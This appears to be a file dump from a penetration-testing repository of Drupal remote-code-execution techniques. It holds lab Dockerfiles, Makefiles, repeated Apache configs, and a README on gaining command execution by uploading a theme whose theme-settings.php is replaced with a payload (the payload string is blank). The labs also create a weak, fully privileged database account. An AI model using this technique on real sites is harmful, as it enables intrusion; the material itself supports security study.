/etc/apache2/ 20 | # |-- apache2.conf 21 | # | `-- ports.conf 22 | # |-- mods-enabled 23 | # | |-- *.load 24 | # | `-- *.conf 25 | # |-- conf-enabled 26 | # | `-- *.conf 27 | # `-- sites-enabled 28 | # `-- *.conf 29 | # 30 | # 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces 32 | # together by including all remaining configuration files when starting up the 33 | # web server. 34 | # 35 | # * ports.conf is always included from the main configuration file. It is 36 | # supposed to determine listening ports for incoming connections which can be 37 | # customized anytime. 38 | # 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ 40 | # directories contain particular configuration snippets which manage modules, 41 | # global configuration fragments, or virtual host configurations, 42 | # respectively. 43 | # 44 | # They are activated by symlinking available configuration files from their 45 | # respective *-available/ counterparts. These should be managed by using our 46 | # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See 47 | # their respective man pages for detailed information. 48 | # 49 | # * The binary is called apache2. Due to the use of environment variables, in 50 | # the default configuration, apache2 needs to be started/stopped with 51 | # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not 52 | # work with the default configuration. 53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 159 | AccessFileName .htaccess 160 | 161 | 162 | Options FollowSymLinks 163 | AllowOverride None 164 | Require all denied 165 | 166 | 167 | 168 | AllowOverride None 169 | Require all granted 170 | 171 | 172 | 173 | Options Indexes FollowSymLinks 174 | AllowOverride All 175 | Require all granted 176 | RewriteEngine on 177 | RewriteBase / 178 | RewriteCond %{REQUEST_FILENAME} !-f 179 | RewriteCond %{REQUEST_FILENAME} !-d 180 | RewriteRule ^(.*)$ index.php?q=$1 [L,QSA] 181 | 182 | 183 | # 184 | # Options Indexes FollowSymLinks 185 | # AllowOverride None 186 | # Require all granted 187 | # 188 | 189 | 190 | 191 | 192 | # AccessFileName: The name of the file to look for in each directory 193 | # for additional configuration directives. See also the AllowOverride 194 | # directive. 195 | # 196 | AccessFileName .htaccess 197 | 198 | # 199 | # The following lines prevent .htaccess and .htpasswd files from being 200 | # viewed by Web clients. 201 | # 202 | 203 | Require all denied 204 | 205 | 206 | 207 | # 208 | # The following directives define some format nicknames for use with 209 | # a CustomLog directive. 210 | # 211 | # These deviate from the Common Log Format definitions in that they use %O 212 | # (the actual bytes sent including headers) instead of %b (the size of the 213 | # requested file), because the latter makes it impossible to detect partial 214 | # requests. 215 | # 216 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 217 | # Use mod_remoteip instead. 218 | # 219 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 220 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 221 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 222 | LogFormat "%{Referer}i -> %U" referer 223 | LogFormat "%{User-agent}i" agent 224 | 225 | # Include of directories ignores editors' and dpkg's backup files, 226 | # see README.Debian for details. 227 | 228 | # Include generic snippets of statements 229 | IncludeOptional conf-enabled/*.conf 230 | 231 | # Include the virtual host configurations: 232 | IncludeOptional sites-enabled/*.conf 233 | 234 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 235 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/files/services-7.x-3.18.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Services-module-unserialize-to-rce/test_env/files/services-7.x-3.18.tar.gz -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/README.md: -------------------------------------------------------------------------------- 1 | # Drupal - Upload a plugin 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on Drupal. 6 | 7 | ## Exploitation 8 | 9 | 10 | 11 | ## References 12 | - 13 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Drupal - Upload a plugin", 3 | "work_in_progress": false, 4 | "references": [] 5 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | ENV DRUPALVERSION "9.2.1" 4 | 5 | RUN apt-get -y -q update; \ 6 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server composer 7 | 8 | COPY ./files/apache2.conf /etc/apache2/apache2.conf 9 | RUN a2enmod rewrite 10 | 11 | RUN service mysql start;\ 12 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 13 | 14 | RUN wget "https://ftp.drupal.org/files/projects/drupal-${DRUPALVERSION}.zip" -O /tmp/drupal.zip ;\ 15 | cd /var/www/html/ ;\ 16 | rm index.html ;\ 17 | unzip /tmp/drupal.zip ;\ 18 | mv drupal-${DRUPALVERSION}/* ./ ;\ 19 | composer install 20 | 21 | RUN chown www-data: -R /var/www/ 22 | 23 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 24 | echo "service mysql start" >> /entrypoint.sh ;\ 25 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 26 | chmod +x /entrypoint.sh 27 | 28 | EXPOSE 80 29 | 30 | CMD /entrypoint.sh 31 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_drupal_upload_a_plugin 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: build 11 | docker run --rm -it -p 10080:80 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 10080:80 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-plugin/test_env/files/apache2.conf: -------------------------------------------------------------------------------- 1 | # This is the main Apache server configuration file. It contains the 2 | # configuration directives that give the server its instructions. 3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about 4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific 5 | # hints. 6 | # 7 | # 8 | # Summary of how the Apache 2 configuration works in Debian: 9 | # The Apache 2 web server configuration in Debian is quite different to 10 | # upstream's suggested way to configure the web server. This is because Debian's 11 | # default Apache2 installation attempts to make adding and removing modules, 12 | # virtual hosts, and extra configuration directives as flexible as possible, in 13 | # order to make automating the changes and administering the server as easy as 14 | # possible. 15 | 16 | # It is split into several files forming the configuration hierarchy outlined 17 | # below, all located in the /etc/apache2/ directory: 18 | # 19 | # /etc/apache2/ 20 | # |-- apache2.conf 21 | # | `-- ports.conf 22 | # |-- mods-enabled 23 | # | |-- *.load 24 | # | `-- *.conf 25 | # |-- conf-enabled 26 | # | `-- *.conf 27 | # `-- sites-enabled 28 | # `-- *.conf 29 | # 30 | # 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces 32 | # together by including all remaining configuration files when starting up the 33 | # web server. 34 | # 35 | # * ports.conf is always included from the main configuration file. It is 36 | # supposed to determine listening ports for incoming connections which can be 37 | # customized anytime. 38 | # 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ 40 | # directories contain particular configuration snippets which manage modules, 41 | # global configuration fragments, or virtual host configurations, 42 | # respectively. 43 | # 44 | # They are activated by symlinking available configuration files from their 45 | # respective *-available/ counterparts. These should be managed by using our 46 | # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See 47 | # their respective man pages for detailed information. 48 | # 49 | # * The binary is called apache2. Due to the use of environment variables, in 50 | # the default configuration, apache2 needs to be started/stopped with 51 | # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not 52 | # work with the default configuration. 53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 159 | AccessFileName .htaccess 160 | 161 | 162 | Options FollowSymLinks 163 | AllowOverride None 164 | Require all denied 165 | 166 | 167 | 168 | AllowOverride None 169 | Require all granted 170 | 171 | 172 | 173 | Options Indexes FollowSymLinks 174 | AllowOverride All 175 | Require all granted 176 | RewriteEngine on 177 | RewriteBase / 178 | RewriteCond %{REQUEST_FILENAME} !-f 179 | RewriteCond %{REQUEST_FILENAME} !-d 180 | RewriteRule ^(.*)$ index.php?q=$1 [L,QSA] 181 | 182 | 183 | # 184 | # Options Indexes FollowSymLinks 185 | # AllowOverride None 186 | # Require all granted 187 | # 188 | 189 | 190 | 191 | 192 | # AccessFileName: The name of the file to look for in each directory 193 | # for additional configuration directives. See also the AllowOverride 194 | # directive. 195 | # 196 | AccessFileName .htaccess 197 | 198 | # 199 | # The following lines prevent .htaccess and .htpasswd files from being 200 | # viewed by Web clients. 201 | # 202 | 203 | Require all denied 204 | 205 | 206 | 207 | # 208 | # The following directives define some format nicknames for use with 209 | # a CustomLog directive. 210 | # 211 | # These deviate from the Common Log Format definitions in that they use %O 212 | # (the actual bytes sent including headers) instead of %b (the size of the 213 | # requested file), because the latter makes it impossible to detect partial 214 | # requests. 215 | # 216 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 217 | # Use mod_remoteip instead. 218 | # 219 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 220 | LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined 221 | LogFormat "%h %l %u %t \"%r\" %>s %O" common 222 | LogFormat "%{Referer}i -> %U" referer 223 | LogFormat "%{User-agent}i" agent 224 | 225 | # Include of directories ignores editors' and dpkg's backup files, 226 | # see README.Debian for details. 227 | 228 | # Include generic snippets of statements 229 | IncludeOptional conf-enabled/*.conf 230 | 231 | # Include the virtual host configurations: 232 | IncludeOptional sites-enabled/*.conf 233 | 234 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 235 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/README.md: -------------------------------------------------------------------------------- 1 | # Drupal - Upload a theme 2 | 3 | ## Requirements 4 | 5 | - A valid **username and password** of a user with **admin rights** on Drupal. 6 | 7 | ## Exploitation 8 | 9 | Drupal restricts direct access to files and folders, so we have to inject our RCE payload into a theme-specific file that the CMS dynamically loads. 10 | 11 | ## Creating the theme archive 12 | 13 | Visit the themes section on the Drupal website [here](https://www.drupal.org/project/project_theme) and download a theme zip file. We'll use the [Zen](https://www.drupal.org/project/zen/releases/8.x-7.0-alpha15) theme for this example. 14 | 15 | After extracting the zip file, find and replace the `theme-settings.php` file with the RCE payload and recreate the zip file of the theme folder: 16 | 17 | ```sh 18 | wget https://ftp.drupal.org/files/projects/zen-8.x-7.0-alpha15.zip 19 | unzip zen-8.x-7.0-alpha15.zip 20 | echo '' > zen/theme-settings.php 21 | zip -9 -r zen.zip zen/ 22 | ``` 23 | 24 | ## Accessing dashboard and installing theme 25 | 26 | Login with a user with administrative rights on the Drupal at [http://TARGET/user/login](http://TARGET/user/login) 27 | 28 | ![](images/README/2022-06-27-04-46-36.png) 29 | 30 | Select "Appearance" from the side menu and click "+Add new theme" on the next page, which should load the following page: 31 | 32 | ![](images/README/2022-06-27-05-04-26.png) 33 | 34 | Select the modified theme zip file and click "Continue". If the files are uploaded, it should display a message similar to below: 35 | 36 | ![](images/README/2022-06-27-05-09-03.png) 37 | 38 | Go back to the "Appearance" page and find the newly uploaded theme listed under the "Uninstalled themes" section. Click the "install" button under the theme name, and the theme should be under the "Installed themes" section now: 39 | 40 | ![](images/README/2022-06-27-05-11-55.png) 41 | 42 | Click on the "settings" option of the theme, which will load the settings page with the injected RCE payload. In our case with the injected payload, we can add the GET parameter `?0=id` and receive RCE output: 43 | 44 | ![](images/README/2022-06-27-05-14-58.png) 45 | 46 | 47 | 48 | ## References 49 | - https://www.drupal.org/project/zen 50 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-04-46-36.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-04-46-36.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-04-26.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-04-26.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-09-03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-09-03.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-11-55.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-11-55.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-14-58.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/images/README/2022-06-27-05-14-58.png -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/technique.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Drupal - Upload a theme", 3 | "work_in_progress": false, 4 | "references": [ 5 | "https://www.drupal.org/project/zen" 6 | ] 7 | } -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/test_env/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | ENV DRUPALVERSION "9.4.1" 4 | 5 | RUN apt-get -y -q update; \ 6 | apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server composer 7 | 8 | COPY ./files/apache2.conf /etc/apache2/apache2.conf 9 | RUN a2enmod rewrite 10 | 11 | RUN service mysql start;\ 12 | mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" 13 | 14 | RUN wget "https://ftp.drupal.org/files/projects/drupal-${DRUPALVERSION}.zip" -O /tmp/drupal.zip ;\ 15 | cd /var/www/html/ ;\ 16 | rm index.html ;\ 17 | unzip /tmp/drupal.zip ;\ 18 | mv drupal-${DRUPALVERSION}/* ./ ;\ 19 | rm -rf vendor/ ;\ 20 | composer install 21 | 22 | RUN chown www-data: -R /var/www/ 23 | 24 | RUN echo "#!/bin/bash" > /entrypoint.sh ;\ 25 | echo "service mysql start" >> /entrypoint.sh ;\ 26 | echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\ 27 | chmod +x /entrypoint.sh 28 | 29 | EXPOSE 80 30 | 31 | CMD /entrypoint.sh 32 | -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/test_env/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: build img 2 | 3 | IMGNAME := awesome_rce_drupal_upload_a_plugin 4 | 5 | all : build 6 | 7 | build: 8 | docker build -t $(IMGNAME):latest -f Dockerfile . 9 | 10 | start: build 11 | docker run --rm -it -p 10080:80 $(IMGNAME) 12 | 13 | background: 14 | docker run --rm -d -p 10080:80 $(IMGNAME) 15 | 16 | shell: 17 | docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash 18 | 19 | stop: 20 | docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') -------------------------------------------------------------------------------- /Content-Management-Systems-(CMS)/Drupal/techniques/Upload-a-theme/test_env/files/apache2.conf: -------------------------------------------------------------------------------- 1 | # This is the main Apache server configuration file. It contains the 2 | # configuration directives that give the server its instructions. 3 | # See http://httpd.apache.org/docs/2.4/ for detailed information about 4 | # the directives and /usr/share/doc/apache2/README.Debian about Debian specific 5 | # hints. 6 | # 7 | # 8 | # Summary of how the Apache 2 configuration works in Debian: 9 | # The Apache 2 web server configuration in Debian is quite different to 10 | # upstream's suggested way to configure the web server. This is because Debian's 11 | # default Apache2 installation attempts to make adding and removing modules, 12 | # virtual hosts, and extra configuration directives as flexible as possible, in 13 | # order to make automating the changes and administering the server as easy as 14 | # possible. 15 | 16 | # It is split into several files forming the configuration hierarchy outlined 17 | # below, all located in the /etc/apache2/ directory: 18 | # 19 | # /etc/apache2/ 20 | # |-- apache2.conf 21 | # | `-- ports.conf 22 | # |-- mods-enabled 23 | # | |-- *.load 24 | # | `-- *.conf 25 | # |-- conf-enabled 26 | # | `-- *.conf 27 | # `-- sites-enabled 28 | # `-- *.conf 29 | # 30 | # 31 | # * apache2.conf is the main configuration file (this file). It puts the pieces 32 | # together by including all remaining configuration files when starting up the 33 | # web server. 34 | # 35 | # * ports.conf is always included from the main configuration file. It is 36 | # supposed to determine listening ports for incoming connections which can be 37 | # customized anytime. 38 | # 39 | # * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/ 40 | # directories contain particular configuration snippets which manage modules, 41 | # global configuration fragments, or virtual host configurations, 42 | # respectively. 43 | # 44 | # They are activated by symlinking available configuration files from their 45 | # respective *-available/ counterparts. These should be managed by using our 46 | # helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See 47 | # their respective man pages for detailed information. 48 | # 49 | # * The binary is called apache2. Due to the use of environment variables, in 50 | # the default configuration, apache2 needs to be started/stopped with 51 | # /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not 52 | # work with the default configuration. 53 | 54 | 55 | # Global configuration 56 | # 57 | 58 | # 59 | # ServerRoot: The top of the directory tree under which the server's 60 | # configuration, error, and log files are kept. 61 | # 62 | # NOTE! If you intend to place this on an NFS (or otherwise network) 63 | # mounted filesystem then please read the Mutex documentation (available 64 | # at ); 65 | # you will save yourself a lot of trouble. 66 | # 67 | # Do NOT add a slash at the end of the directory path. 68 | # 69 | #ServerRoot "/etc/apache2" 70 | 71 | # 72 | # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. 73 | # 74 | #Mutex file:${APACHE_LOCK_DIR} default 75 | 76 | # 77 | # The directory where shm and other runtime files will be stored. 78 | # 79 | 80 | DefaultRuntimeDir ${APACHE_RUN_DIR} 81 | 82 | # 83 | # PidFile: The file in which the server should record its process 84 | # identification number when it starts. 85 | # This needs to be set in /etc/apache2/envvars 86 | # 87 | PidFile ${APACHE_PID_FILE} 88 | 89 | # 90 | # Timeout: The number of seconds before receives and sends time out. 91 | # 92 | Timeout 300 93 | 94 | # 95 | # KeepAlive: Whether or not to allow persistent connections (more than 96 | # one request per connection). Set to "Off" to deactivate. 97 | # 98 | KeepAlive On 99 | 100 | # 101 | # MaxKeepAliveRequests: The maximum number of requests to allow 102 | # during a persistent connection. Set to 0 to allow an unlimited amount. 103 | # We recommend you leave this number high, for maximum performance. 104 | # 105 | MaxKeepAliveRequests 100 106 | 107 | # 108 | # KeepAliveTimeout: Number of seconds to wait for the next request from the 109 | # same client on the same connection. 110 | # 111 | KeepAliveTimeout 5 112 | 113 | 114 | # These need to be set in /etc/apache2/envvars 115 | User ${APACHE_RUN_USER} 116 | Group ${APACHE_RUN_GROUP} 117 | 118 | # 119 | # HostnameLookups: Log the names of clients or just their IP addresses 120 | # e.g., www.apache.org (on) or 204.62.129.132 (off). 121 | # The default is off because it'd be overall better for the net if people 122 | # had to knowingly turn this feature on, since enabling it means that 123 | # each client request will result in AT LEAST one lookup request to the 124 | # nameserver. 125 | # 126 | HostnameLookups Off 127 | 128 | # ErrorLog: The location of the error log file. 129 | # If you do not specify an ErrorLog directive within a 130 | # container, error messages relating to that virtual host will be 131 | # logged here. If you *do* define an error logfile for a 132 | # container, that host's errors will be logged there and not here. 133 | # 134 | ErrorLog ${APACHE_LOG_DIR}/error.log 135 | 136 | # 137 | # LogLevel: Control the severity of messages logged to the error_log. 138 | # Available values: trace8, ..., trace1, debug, info, notice, warn, 139 | # error, crit, alert, emerg. 140 | # It is also possible to configure the log level for particular modules, e.g. 141 | # "LogLevel info ssl:warn" 142 | # 143 | LogLevel warn 144 | 145 | # Include module configuration: 146 | IncludeOptional mods-enabled/*.load 147 | IncludeOptional mods-enabled/*.conf 148 | 149 | # Include list of ports to listen on 150 | Include ports.conf 151 | 152 | 153 | # Sets the default security model of the Apache2 HTTPD server. It does 154 | # not allow access to the root filesystem outside of /usr/share and /var/www. 155 | # The former is used by web applications packaged in Debian, 156 | # the latter may be used for local directories served by the web server. If 157 | # your system is serving content from a sub-directory in /srv you must allow 158 | # access here, or in any related virtual host. 159 | AccessFileName .htaccess 160 | 161 | 162 | Options FollowSymLinks 163 | AllowOverride None 164 | Require all denied 165 | 166 | 167 | 168 | AllowOverride None 169 | Require all granted 170 | 171 | 172 | 173 | Options Indexes FollowSymLinks 174 | AllowOverride All 175 | Require all granted 176 | RewriteEngine on 177 | RewriteBase / 178 | RewriteCond %{REQUEST_FILENAME} !-f 179 | RewriteCond %{REQUEST_FILENAME} !-d 180 | RewriteRule ^(.*)$ index.php?q=$1 [L,QSA] 181 | 182 | 183 | # 184 | # Options Indexes FollowSymLinks 185 | # AllowOverride None 186 | # Require all granted 187 | # 188 | 189 | 190 | 191 | 192 | # AccessFileName: The name of the file to look for in each directory 193 | # for additional configuration directives. See also the AllowOverride 194 | # directive. 195 | # 196 | AccessFileName .htaccess 197 | 198 | # 199 | # The following lines prevent .htaccess and .htpasswd files from being 200 | # viewed by Web clients. 201 | # 202 | 203 | Require all denied 204 | 205 | 206 | 207 | # 208 | # The following directives define some format nicknames for use with 209 | # a CustomLog directive. 210 | # 211 | # These deviate from the Common Log Format definitions in that they use %O 212 | # (the actual bytes sent including headers) instead of %b (the size of the 213 | # requested file), because the latter makes it impossible to detect partial 214 | # requests. 215 | # 216 | # Note that the use of %{X-Forwarded-For}i instead of %h is not recommended. 217 | # Use mod_remoteip instead. 218 | # 219 | LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined 220 | LogFormat "%h %l %u %t \"%r\" %>s %O 